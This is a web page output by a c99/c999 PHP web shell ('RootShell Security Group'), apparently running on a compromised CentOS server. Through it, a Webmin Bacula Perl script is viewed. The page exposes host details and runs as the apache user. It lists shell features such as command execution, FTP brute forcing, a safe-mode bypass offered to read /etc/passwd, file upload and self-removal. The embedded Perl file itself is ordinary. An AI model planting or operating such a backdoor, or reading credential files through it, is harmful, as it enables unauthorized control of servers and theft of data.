!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bacula-backup/   drwxr-xr-x
Free 53.72 GB of 127.8 GB (42.03%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     list_grestore.cgi (1.62 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show a form for restoring an old node group backup job

require './bacula-backup-lib.pl';
&ui_print_header(undef,  $text{'grestore_title'}, "", "grestore");

print &ui_form_start("grestore.cgi", "post");
print &ui_table_start($text{'grestore_header'}, undef, 2);

# Old job to restore
$dbh = &connect_to_database();
$cmd = $dbh->prepare("select JobId,Name,SchedTime from Job where Name not like 'Restore%' order by SchedTime desc") ||
                &error("prepare failed : ",$dbh->errstr);
$cmd->execute();
while(my ($id, $name, $when) = $cmd->fetchrow()) {
    if ($oc = &is_oc_object($name)) {
        push(@opts, [ $id, "$oc ($id) ($when)" ]);
        }
    }
$cmd->finish();
print &ui_table_row($text{'restore_job'},
            &ui_select("job", undef, \@opts));

# Files to restore
print &ui_table_row($text{'restore_files'},
            &ui_textarea("files", undef, 8, 50)."\n".
            &bacula_file_button("files", "job"));

# Destination client
@clients = sort { lc($a->{'name'}) cmp lc($b->{'name'}) }
        grep { &is_oc_object($_, 1) } &get_bacula_clients();
print &ui_table_row($text{'restore_client'},
    &ui_select("client", undef,
     [ map { [ $_->{'name'},
           &text('clientstatus_on', $_->{'name'}, $_->{'address'}) ] }
       @clients ]));

# Storage device
@storages = sort { lc($a->{'name'}) cmp lc($b->{'name'}) }
        &get_bacula_storages();
print &ui_table_row($text{'restore_storage'},
    &ui_select("storage", undef,
     [ map { [ $_->{'name'},
           &text('storagestatus_on', $_->{'name'}, $_->{'address'}) ] }
       @storages ]));

print &ui_table_end();
print &ui_form_end([ [ "restore", $text{'restore_ok'} ] ]);

&ui_print_footer("", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.013 ]--